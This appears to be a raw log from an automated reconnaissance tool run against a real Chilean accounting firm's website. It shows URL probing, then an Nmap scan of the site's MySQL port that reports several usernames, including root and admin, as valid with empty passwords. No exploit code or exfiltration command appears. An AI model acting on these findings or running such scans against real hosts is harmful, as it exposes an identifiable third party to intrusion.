3548|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3549|_[ + ] More details:: / - / , ISP:
3550|_[ + ] Found:: UNIDENTIFIED
3551
3552 _[ - ]::--------------------------------------------------------------------------------------------------------------
3553|_[ + ] [ 2 / 55 ]-[07:12:24] [ - ]
3554|_[ + ] Target:: [ http://www.chilefa.cl/2019/ ]
3555|_[ + ] Exploit::
3556|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3557|_[ + ] More details:: / - / , ISP:
3558|_[ + ] Found:: UNIDENTIFIED
3559
3560 _[ - ]::--------------------------------------------------------------------------------------------------------------
3561|_[ + ] [ 3 / 55 ]-[07:12:27] [ - ]
3562|_[ + ] Target:: [ http://www.chilefa.cl/blog/ ]
3563|_[ + ] Exploit::
3564|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3565|_[ + ] More details:: / - / , ISP:
3566|_[ + ] Found:: UNIDENTIFIED
3567
3568 _[ - ]::--------------------------------------------------------------------------------------------------------------
3569|_[ + ] [ 4 / 55 ]-[07:12:30] [ - ]
3570|_[ + ] Target:: [ http://www.chilefa.cl/services/ ]
3571|_[ + ] Exploit::
3572|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3573|_[ + ] More details:: / - / , ISP:
3574|_[ + ] Found:: UNIDENTIFIED
3575
3576 _[ - ]::--------------------------------------------------------------------------------------------------------------
3577|_[ + ] [ 5 / 55 ]-[07:12:32] [ - ]
3578|_[ + ] Target:: [ http://www.chilefa.cl/contact/ ]
3579|_[ + ] Exploit::
3580|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3581|_[ + ] More details:: / - / , ISP:
3582|_[ + ] Found:: UNIDENTIFIED
3583
3584 _[ - ]::--------------------------------------------------------------------------------------------------------------
3585|_[ + ] [ 6 / 55 ]-[07:12:35] [ - ]
3586|_[ + ] Target:: [ http://www.chilefa.cl/2017/07/ ]
3587|_[ + ] Exploit::
3588|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3589|_[ + ] More details:: / - / , ISP:
3590|_[ + ] Found:: UNIDENTIFIED
3591
3592 _[ - ]::--------------------------------------------------------------------------------------------------------------
3593|_[ + ] [ 7 / 55 ]-[07:12:37] [ - ]
3594|_[ + ] Target:: [ http://www.chilefa.cl/our-customers/ ]
3595|_[ + ] Exploit::
3596|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3597|_[ + ] More details:: / - / , ISP:
3598|_[ + ] Found:: UNIDENTIFIED
3599
3600 _[ - ]::--------------------------------------------------------------------------------------------------------------
3601|_[ + ] [ 8 / 55 ]-[07:12:40] [ - ]
3602|_[ + ] Target:: [ http://www.chilefa.cl/2014/04/ ]
3603|_[ + ] Exploit::
3604|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3605|_[ + ] More details:: / - / , ISP:
3606|_[ + ] Found:: UNIDENTIFIED
3607
3608 _[ - ]::--------------------------------------------------------------------------------------------------------------
3609|_[ + ] [ 9 / 55 ]-[07:12:42] [ - ]
3610|_[ + ] Target:: [ http://www.chilefa.cl/2014/12/ ]
3611|_[ + ] Exploit::
3612|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3613|_[ + ] More details:: / - / , ISP:
3614|_[ + ] Found:: UNIDENTIFIED
3615
3616 _[ - ]::--------------------------------------------------------------------------------------------------------------
3617|_[ + ] [ 10 / 55 ]-[07:12:45] [ - ]
3618|_[ + ] Target:: [ http://www.chilefa.cl/portfolio/audit/ ]
3619|_[ + ] Exploit::
3620|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3621|_[ + ] More details:: / - / , ISP:
3622|_[ + ] Found:: UNIDENTIFIED
3623
3624 _[ - ]::--------------------------------------------------------------------------------------------------------------
3625|_[ + ] [ 11 / 55 ]-[07:12:47] [ - ]
3626|_[ + ] Target:: [ http://www.chilefa.cl/2019/06/ ]
3627|_[ + ] Exploit::
3628|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3629|_[ + ] More details:: / - / , ISP:
3630|_[ + ] Found:: UNIDENTIFIED
3631
3632 _[ - ]::--------------------------------------------------------------------------------------------------------------
3633|_[ + ] [ 12 / 55 ]-[07:12:50] [ - ]
3634|_[ + ] Target:: [ http://www.chilefa.cl/2018/01/ ]
3635|_[ + ] Exploit::
3636|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3637|_[ + ] More details:: / - / , ISP:
3638|_[ + ] Found:: UNIDENTIFIED
3639
3640 _[ - ]::--------------------------------------------------------------------------------------------------------------
3641|_[ + ] [ 13 / 55 ]-[07:12:53] [ - ]
3642|_[ + ] Target:: [ http://www.chilefa.cl/es/tag/impuestos/ ]
3643|_[ + ] Exploit::
3644|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3645|_[ + ] More details:: / - / , ISP:
3646|_[ + ] Found:: UNIDENTIFIED
3647
3648 _[ - ]::--------------------------------------------------------------------------------------------------------------
3649|_[ + ] [ 14 / 55 ]-[07:12:55] [ - ]
3650|_[ + ] Target:: [ http://www.chilefa.cl/2014/04/07/ ]
3651|_[ + ] Exploit::
3652|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3653|_[ + ] More details:: / - / , ISP:
3654|_[ + ] Found:: UNIDENTIFIED
3655
3656 _[ - ]::--------------------------------------------------------------------------------------------------------------
3657|_[ + ] [ 15 / 55 ]-[07:12:57] [ - ]
3658|_[ + ] Target:: [ http://www.chilefa.cl/es/author/javiles/ ]
3659|_[ + ] Exploit::
3660|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3661|_[ + ] More details:: / - / , ISP:
3662|_[ + ] Found:: UNIDENTIFIED
3663
3664 _[ - ]::--------------------------------------------------------------------------------------------------------------
3665|_[ + ] [ 16 / 55 ]-[07:13:00] [ - ]
3666|_[ + ] Target:: [ http://www.chilefa.cl/2019/02/08/ ]
3667|_[ + ] Exploit::
3668|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3669|_[ + ] More details:: / - / , ISP:
3670|_[ + ] Found:: UNIDENTIFIED
3671
3672 _[ - ]::--------------------------------------------------------------------------------------------------------------
3673|_[ + ] [ 17 / 55 ]-[07:13:02] [ - ]
3674|_[ + ] Target:: [ http://www.chilefa.cl/portfolio/legal-services/ ]
3675|_[ + ] Exploit::
3676|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3677|_[ + ] More details:: / - / , ISP:
3678|_[ + ] Found:: UNIDENTIFIED
3679
3680 _[ - ]::--------------------------------------------------------------------------------------------------------------
3681|_[ + ] [ 18 / 55 ]-[07:13:04] [ - ]
3682|_[ + ] Target:: [ http://www.chilefa.cl/portfolio/financial-planning/ ]
3683|_[ + ] Exploit::
3684|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3685|_[ + ] More details:: / - / , ISP:
3686|_[ + ] Found:: UNIDENTIFIED
3687
3688 _[ - ]::--------------------------------------------------------------------------------------------------------------
3689|_[ + ] [ 19 / 55 ]-[07:13:07] [ - ]
3690|_[ + ] Target:: [ http://www.chilefa.cl/portfolio/tax-planning/ ]
3691|_[ + ] Exploit::
3692|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3693|_[ + ] More details:: / - / , ISP:
3694|_[ + ] Found:: UNIDENTIFIED
3695
3696 _[ - ]::--------------------------------------------------------------------------------------------------------------
3697|_[ + ] [ 20 / 55 ]-[07:13:10] [ - ]
3698|_[ + ] Target:: [ http://www.chilefa.cl/portfolio/outsourcing-2/ ]
3699|_[ + ] Exploit::
3700|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3701|_[ + ] More details:: / - / , ISP:
3702|_[ + ] Found:: UNIDENTIFIED
3703
3704 _[ - ]::--------------------------------------------------------------------------------------------------------------
3705|_[ + ] [ 21 / 55 ]-[07:13:12] [ - ]
3706|_[ + ] Target:: [ http://www.chilefa.cl/es/portfolio/capacitacion/ ]
3707|_[ + ] Exploit::
3708|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3709|_[ + ] More details:: / - / , ISP:
3710|_[ + ] Found:: UNIDENTIFIED
3711
3712 _[ - ]::--------------------------------------------------------------------------------------------------------------
3713|_[ + ] [ 22 / 55 ]-[07:13:14] [ - ]
3714|_[ + ] Target:: [ http://www.chilefa.cl/pt-tags/chile/ ]
3715|_[ + ] Exploit::
3716|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3717|_[ + ] More details:: / - / , ISP:
3718|_[ + ] Found:: UNIDENTIFIED
3719
3720 _[ - ]::--------------------------------------------------------------------------------------------------------------
3721|_[ + ] [ 23 / 55 ]-[07:13:16] [ - ]
3722|_[ + ] Target:: [ http://www.chilefa.cl/pt-tags/reae/ ]
3723|_[ + ] Exploit::
3724|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3725|_[ + ] More details:: / - / , ISP:
3726|_[ + ] Found:: UNIDENTIFIED
3727
3728 _[ - ]::--------------------------------------------------------------------------------------------------------------
3729|_[ + ] [ 24 / 55 ]-[07:13:19] [ - ]
3730|_[ + ] Target:: [ http://www.chilefa.cl/pt-tags/iva/ ]
3731|_[ + ] Exploit::
3732|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3733|_[ + ] More details:: / - / , ISP:
3734|_[ + ] Found:: UNIDENTIFIED
3735
3736 _[ - ]::--------------------------------------------------------------------------------------------------------------
3737|_[ + ] [ 25 / 55 ]-[07:13:22] [ - ]
3738|_[ + ] Target:: [ http://www.chilefa.cl/pt-tags/svs/ ]
3739|_[ + ] Exploit::
3740|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3741|_[ + ] More details:: / - / , ISP:
3742|_[ + ] Found:: UNIDENTIFIED
3743
3744 _[ - ]::--------------------------------------------------------------------------------------------------------------
3745|_[ + ] [ 26 / 55 ]-[07:13:24] [ - ]
3746|_[ + ] Target:: [ http://www.chilefa.cl/pt-tags/gaap/ ]
3747|_[ + ] Exploit::
3748|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3749|_[ + ] More details:: / - / , ISP:
3750|_[ + ] Found:: UNIDENTIFIED
3751
3752 _[ - ]::--------------------------------------------------------------------------------------------------------------
3753|_[ + ] [ 27 / 55 ]-[07:13:27] [ - ]
3754|_[ + ] Target:: [ http://www.chilefa.cl/tag/chilean-tax-system/ ]
3755|_[ + ] Exploit::
3756|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3757|_[ + ] More details:: / - / , ISP:
3758|_[ + ] Found:: UNIDENTIFIED
3759
3760 _[ - ]::--------------------------------------------------------------------------------------------------------------
3761|_[ + ] [ 28 / 55 ]-[07:13:29] [ - ]
3762|_[ + ] Target:: [ http://www.chilefa.cl/services/tax-law-reform/ ]
3763|_[ + ] Exploit::
3764|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3765|_[ + ] More details:: / - / , ISP:
3766|_[ + ] Found:: UNIDENTIFIED
3767
3768 _[ - ]::--------------------------------------------------------------------------------------------------------------
3769|_[ + ] [ 29 / 55 ]-[07:13:31] [ - ]
3770|_[ + ] Target:: [ http://www.chilefa.cl/portfolio/mergers-and-acquisitions/ ]
3771|_[ + ] Exploit::
3772|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3773|_[ + ] More details:: / - / , ISP:
3774|_[ + ] Found:: UNIDENTIFIED
3775
3776 _[ - ]::--------------------------------------------------------------------------------------------------------------
3777|_[ + ] [ 30 / 55 ]-[07:13:34] [ - ]
3778|_[ + ] Target:: [ http://www.chilefa.cl/portfolio/tax-law-reform/ ]
3779|_[ + ] Exploit::
3780|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3781|_[ + ] More details:: / - / , ISP:
3782|_[ + ] Found:: UNIDENTIFIED
3783
3784 _[ - ]::--------------------------------------------------------------------------------------------------------------
3785|_[ + ] [ 31 / 55 ]-[07:13:36] [ - ]
3786|_[ + ] Target:: [ http://www.chilefa.cl/315-2/our-team/ ]
3787|_[ + ] Exploit::
3788|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3789|_[ + ] More details:: / - / , ISP:
3790|_[ + ] Found:: UNIDENTIFIED
3791
3792 _[ - ]::--------------------------------------------------------------------------------------------------------------
3793|_[ + ] [ 32 / 55 ]-[07:13:39] [ - ]
3794|_[ + ] Target:: [ http://www.chilefa.cl/pt-tags/auditoria-2/ ]
3795|_[ + ] Exploit::
3796|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3797|_[ + ] More details:: / - / , ISP:
3798|_[ + ] Found:: UNIDENTIFIED
3799
3800 _[ - ]::--------------------------------------------------------------------------------------------------------------
3801|_[ + ] [ 33 / 55 ]-[07:13:41] [ - ]
3802|_[ + ] Target:: [ http://www.chilefa.cl/pt-sort-categ/services/ ]
3803|_[ + ] Exploit::
3804|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3805|_[ + ] More details:: / - / , ISP:
3806|_[ + ] Found:: UNIDENTIFIED
3807
3808 _[ - ]::--------------------------------------------------------------------------------------------------------------
3809|_[ + ] [ 34 / 55 ]-[07:13:44] [ - ]
3810|_[ + ] Target:: [ http://www.chilefa.cl/pt-tags/chile-audit/ ]
3811|_[ + ] Exploit::
3812|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3813|_[ + ] More details:: / - / , ISP:
3814|_[ + ] Found:: UNIDENTIFIED
3815
3816 _[ - ]::--------------------------------------------------------------------------------------------------------------
3817|_[ + ] [ 35 / 55 ]-[07:13:46] [ - ]
3818|_[ + ] Target:: [ http://www.chilefa.cl/pt-tags/tax-planning/ ]
3819|_[ + ] Exploit::
3820|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3821|_[ + ] More details:: / - / , ISP:
3822|_[ + ] Found:: UNIDENTIFIED
3823
3824 _[ - ]::--------------------------------------------------------------------------------------------------------------
3825|_[ + ] [ 36 / 55 ]-[07:13:49] [ - ]
3826|_[ + ] Target:: [ http://www.chilefa.cl/es/tag/income-tax-chile/ ]
3827|_[ + ] Exploit::
3828|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3829|_[ + ] More details:: / - / , ISP:
3830|_[ + ] Found:: UNIDENTIFIED
3831
3832 _[ - ]::--------------------------------------------------------------------------------------------------------------
3833|_[ + ] [ 37 / 55 ]-[07:13:52] [ - ]
3834|_[ + ] Target:: [ http://www.chilefa.cl/es/portfolio/gestion-de-riesgos/ ]
3835|_[ + ] Exploit::
3836|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3837|_[ + ] More details:: / - / , ISP:
3838|_[ + ] Found:: UNIDENTIFIED
3839
3840 _[ - ]::--------------------------------------------------------------------------------------------------------------
3841|_[ + ] [ 38 / 55 ]-[07:13:54] [ - ]
3842|_[ + ] Target:: [ http://www.chilefa.cl/pt-sort-categ/corporate-finance/ ]
3843|_[ + ] Exploit::
3844|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3845|_[ + ] More details:: / - / , ISP:
3846|_[ + ] Found:: UNIDENTIFIED
3847
3848 _[ - ]::--------------------------------------------------------------------------------------------------------------
3849|_[ + ] [ 39 / 55 ]-[07:13:57] [ - ]
3850|_[ + ] Target:: [ http://www.chilefa.cl/pt-tags/chilean-tax-regulation/ ]
3851|_[ + ] Exploit::
3852|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3853|_[ + ] More details:: / - / , ISP:
3854|_[ + ] Found:: UNIDENTIFIED
3855
3856 _[ - ]::--------------------------------------------------------------------------------------------------------------
3857|_[ + ] [ 40 / 55 ]-[07:14:00] [ - ]
3858|_[ + ] Target:: [ http://www.chilefa.cl/es/pt-tags/planificacion-tributaria/ ]
3859|_[ + ] Exploit::
3860|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3861|_[ + ] More details:: / - / , ISP:
3862|_[ + ] Found:: UNIDENTIFIED
3863
3864 _[ - ]::--------------------------------------------------------------------------------------------------------------
3865|_[ + ] [ 41 / 55 ]-[07:14:02] [ - ]
3866|_[ + ] Target:: [ http://www.chilefa.cl/portfolio/jose-luis-aviles-munoz/ ]
3867|_[ + ] Exploit::
3868|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3869|_[ + ] More details:: / - / , ISP:
3870|_[ + ] Found:: UNIDENTIFIED
3871
3872 _[ - ]::--------------------------------------------------------------------------------------------------------------
3873|_[ + ] [ 42 / 55 ]-[07:14:05] [ - ]
3874|_[ + ] Target:: [ http://www.chilefa.cl/chilean-income-tax-return-ty-2018/ ]
3875|_[ + ] Exploit::
3876|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3877|_[ + ] More details:: / - / , ISP:
3878|_[ + ] Found:: UNIDENTIFIED
3879
3880 _[ - ]::--------------------------------------------------------------------------------------------------------------
3881|_[ + ] [ 43 / 55 ]-[07:14:08] [ - ]
3882|_[ + ] Target:: [ http://www.chilefa.cl/315-2/our-team/our-team/ ]
3883|_[ + ] Exploit::
3884|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3885|_[ + ] More details:: / - / , ISP:
3886|_[ + ] Found:: UNIDENTIFIED
3887
3888 _[ - ]::--------------------------------------------------------------------------------------------------------------
3889|_[ + ] [ 44 / 55 ]-[07:14:11] [ - ]
3890|_[ + ] Target:: [ http://www.chilefa.cl/pt-sort-categ/m-a-en/ ]
3891|_[ + ] Exploit::
3892|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3893|_[ + ] More details:: / - / , ISP:
3894|_[ + ] Found:: UNIDENTIFIED
3895
3896 _[ - ]::--------------------------------------------------------------------------------------------------------------
3897|_[ + ] [ 45 / 55 ]-[07:14:14] [ - ]
3898|_[ + ] Target:: [ http://www.chilefa.cl/chilean-income-tax-return-process-year-2019/ ]
3899|_[ + ] Exploit::
3900|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3901|_[ + ] More details:: / - / , ISP:
3902|_[ + ] Found:: UNIDENTIFIED
3903
3904 _[ - ]::--------------------------------------------------------------------------------------------------------------
3905|_[ + ] [ 46 / 55 ]-[07:14:16] [ - ]
3906|_[ + ] Target:: [ http://www.chilefa.cl/tax-law-reform-in-the-year-2014/ ]
3907|_[ + ] Exploit::
3908|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3909|_[ + ] More details:: / - / , ISP:
3910|_[ + ] Found:: UNIDENTIFIED
3911
3912 _[ - ]::--------------------------------------------------------------------------------------------------------------
3913|_[ + ] [ 47 / 55 ]-[07:14:19] [ - ]
3914|_[ + ] Target:: [ http://www.chilefa.cl/portfolio/doing-business-in-chile-year-2019/ ]
3915|_[ + ] Exploit::
3916|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3917|_[ + ] More details:: / - / , ISP:
3918|_[ + ] Found:: UNIDENTIFIED
3919
3920 _[ - ]::--------------------------------------------------------------------------------------------------------------
3921|_[ + ] [ 48 / 55 ]-[07:14:22] [ - ]
3922|_[ + ] Target:: [ http://www.chilefa.cl/wp-content/themes/trymee/images/prettyPhoto/light_square/ ]
3923|_[ + ] Exploit::
3924|_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.0 , IP:143.95.110.248:80
3925|_[ + ] More details:: / - / , ISP:
3926|_[ + ] Found:: UNIDENTIFIED
3927
3928 _[ - ]::--------------------------------------------------------------------------------------------------------------
3929|_[ + ] [ 49 / 55 ]-[07:14:25] [ - ]
3930|_[ + ] Target:: [ http://www.chilefa.cl/es/especial-derecho-tributario-en-el-ano-2014-3/ ]
3931|_[ + ] Exploit::
3932|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3933|_[ + ] More details:: / - / , ISP:
3934|_[ + ] Found:: UNIDENTIFIED
3935
3936 _[ - ]::--------------------------------------------------------------------------------------------------------------
3937|_[ + ] [ 50 / 55 ]-[07:14:28] [ - ]
3938|_[ + ] Target:: [ http://www.chilefa.cl/international-taxation-affidavits-tax-year-2019-commercial-year-2018/ ]
3939|_[ + ] Exploit::
3940|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3941|_[ + ] More details:: / - / , ISP:
3942|_[ + ] Found:: UNIDENTIFIED
3943
3944 _[ - ]::--------------------------------------------------------------------------------------------------------------
3945|_[ + ] [ 51 / 55 ]-[07:14:30] [ - ]
3946|_[ + ] Target:: [ http://www.chilefa.cl/pt-tags/registro-de-empresas-de-auditoria-externa-reae/ ]
3947|_[ + ] Exploit::
3948|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3949|_[ + ] More details:: / - / , ISP:
3950|_[ + ] Found:: UNIDENTIFIED
3951
3952 _[ - ]::--------------------------------------------------------------------------------------------------------------
3953|_[ + ] [ 52 / 55 ]-[07:14:33] [ - ]
3954|_[ + ] Target:: [ http://www.chilefa.cl/tax-reform-income-tax-taxation-regimes-and-rates-for-commercial-year-2017/ ]
3955|_[ + ] Exploit::
3956|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3957|_[ + ] More details:: / - / , ISP:
3958|_[ + ] Found:: UNIDENTIFIED
3959
3960 _[ - ]::--------------------------------------------------------------------------------------------------------------
3961|_[ + ] [ 53 / 55 ]-[07:14:36] [ - ]
3962|_[ + ] Target:: [ http://www.chilefa.cl/law-20-720-of-insolvency-and-re-entrepreneurship-replacing-the-bankruptcy-law/ ]
3963|_[ + ] Exploit::
3964|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3965|_[ + ] More details:: / - / , ISP:
3966|_[ + ] Found:: UNIDENTIFIED
3967
3968 _[ - ]::--------------------------------------------------------------------------------------------------------------
3969|_[ + ] [ 54 / 55 ]-[07:14:39] [ - ]
3970|_[ + ] Target:: [ http://www.chilefa.cl/sii-publico-listado-de-150-paises-y-jurisdicciones-que-tienen-un-regimen-fiscal-preferencial/ ]
3971|_[ + ] Exploit::
3972|_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: nginx/1.14.0 , IP:143.95.110.248:80
3973|_[ + ] More details:: / - / , ISP:
3974|_[ + ] Found:: UNIDENTIFIED
3975
3976[ INFO ] [ Shutting down ]
3977[ INFO ] [ End of process INURLBR at [02-03-2020 07:14:39]
3978[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
3979[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.chilefa.cl/output/inurlbr-www.chilefa.cl ]
3980|_________________________________________________________________________________________
3981
3982\_________________________________________________________________________________________/
3983#####################################################################################################################################
3984Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 07:14 EST
3985NSE: Loaded 57 scripts for scanning.
3986NSE: Script Pre-scanning.
3987Initiating NSE at 07:14
3988Completed NSE at 07:14, 0.00s elapsed
3989Initiating NSE at 07:14
3990Completed NSE at 07:14, 0.00s elapsed
3991Initiating Parallel DNS resolution of 1 host. at 07:14
3992Completed Parallel DNS resolution of 1 host. at 07:14, 0.03s elapsed
3993Initiating SYN Stealth Scan at 07:14
3994Scanning www.chilefa.cl (143.95.110.248) [1 port]
3995Discovered open port 3306/tcp on 143.95.110.248
3996Completed SYN Stealth Scan at 07:14, 0.50s elapsed (1 total ports)
3997Initiating Service scan at 07:14
3998Scanning 1 service on www.chilefa.cl (143.95.110.248)
3999Completed Service scan at 07:14, 0.75s elapsed (1 service on 1 host)
4000Initiating OS detection (try #1) against www.chilefa.cl (143.95.110.248)
4001Retrying OS detection (try #2) against www.chilefa.cl (143.95.110.248)
4002Initiating Traceroute at 07:14
4003Completed Traceroute at 07:14, 0.66s elapsed
4004Initiating Parallel DNS resolution of 19 hosts. at 07:14
4005Completed Parallel DNS resolution of 19 hosts. at 07:14, 2.52s elapsed
4006NSE: Script scanning 143.95.110.248.
4007Initiating NSE at 07:14
4008Completed NSE at 07:16, 91.24s elapsed
4009Initiating NSE at 07:16
4010Completed NSE at 07:16, 0.05s elapsed
4011Nmap scan report for www.chilefa.cl (143.95.110.248)
4012Host is up (0.43s latency).
4013rDNS record for 143.95.110.248: ip-143-95-110-248.iplocal
4014
4015PORT STATE SERVICE VERSION
40163306/tcp open mysql MySQL 5.6.41-84.1
4017| mysql-enum:
4018| Valid usernames:
4019| admin:<empty> - Valid credentials
4020| netadmin:<empty> - Valid credentials
4021| guest:<empty> - Valid credentials
4022| web:<empty> - Valid credentials
4023| user:<empty> - Valid credentials
4024| webadmin:<empty> - Valid credentials
4025| root:<empty> - Valid credentials
4026| sysadmin:<empty> - Valid credentials
4027| administrator:<empty> - Valid credentials
4028| test:<empty> - Valid credentials
4029|_ Statistics: Performed 10 guesses in 3 seconds, average tps: 3.3
4030| mysql-info:
4031| Protocol: 10
4032| Version: 5.6.41-84.1
4033| Thread ID: 55601794
4034| Capabilities flags: 63487
4035| Some Capabilities: LongColumnFlag, Support41Auth, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, ConnectWithDatabase, SupportsCompression, SupportsLoadDataLocal, ODBCClient, FoundRows, Speaks41ProtocolNew, InteractiveClient, SupportsTransactions, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, LongPassword, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
4036| Status: Autocommit
4037| Salt: K+5g',G_(Iu5D7'ZsT)k
4038|_ Auth Plugin Name: mysql_native_password
4039| vulners:
4040| MySQL 5.6.41-84.1:
4041|_ NODEJS:602 0.0 https://vulners.com/nodejs/NODEJS:602
4042Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4043Aggressive OS guesses: Grandstream GXV3275 video phone (91%), Linux 3.2 - 3.8 (91%), Linux 3.3 (91%), Tomato 1.27 - 1.28 (Linux 2.4.20) (91%), Linux 2.6.18 - 2.6.22 (90%), MikroTik RouterOS 6.15 (Linux 3.3.5) (90%), MikroTik RouterOS 6.32.1 (89%), Linux 2.6.32 - 2.6.39 (89%), Linux 2.6.32 (89%), HP P2000 G3 NAS device (88%)
4044No exact OS matches for host (test conditions non-ideal).
4045Uptime guess: 269.179 days (since Fri Jun 7 03:58:38 2019)
4046Network Distance: 19 hops
4047TCP Sequence Prediction: Difficulty=255 (Good luck!)
4048IP ID Sequence Generation: All zeros
4049
4050TRACEROUTE (using port 3306/tcp)
4051HOP RTT ADDRESS
40521 219.91 ms 10.202.8.1
40532 361.54 ms 185.32.222.3
40543 361.60 ms core02-40gb.datasource.ch (91.201.58.73)
40554 361.63 ms zch-b2-link.telia.net (62.115.180.122)
40565 361.66 ms ffm-bb1-link.telia.net (62.115.142.110)
40576 361.74 ms ffm-b5-link.telia.net (62.115.114.91)
40587 361.73 ms be3031.agr41.fra03.atlas.cogentco.com (130.117.14.197)
40598 361.72 ms be3186.ccr41.fra03.atlas.cogentco.com (130.117.0.1)
40609 361.87 ms be2813.ccr41.ams03.atlas.cogentco.com (130.117.0.121)
406110 286.39 ms be2183.ccr22.lpl01.atlas.cogentco.com (154.54.58.69)
406211 286.41 ms be3043.ccr22.ymq01.atlas.cogentco.com (154.54.44.166)
406312 286.39 ms be3260.ccr32.yyz02.atlas.cogentco.com (154.54.42.89)
406413 286.45 ms be2890.ccr22.cle04.atlas.cogentco.com (154.54.82.245)
406514 286.36 ms be2717.ccr41.ord01.atlas.cogentco.com (154.54.6.221)
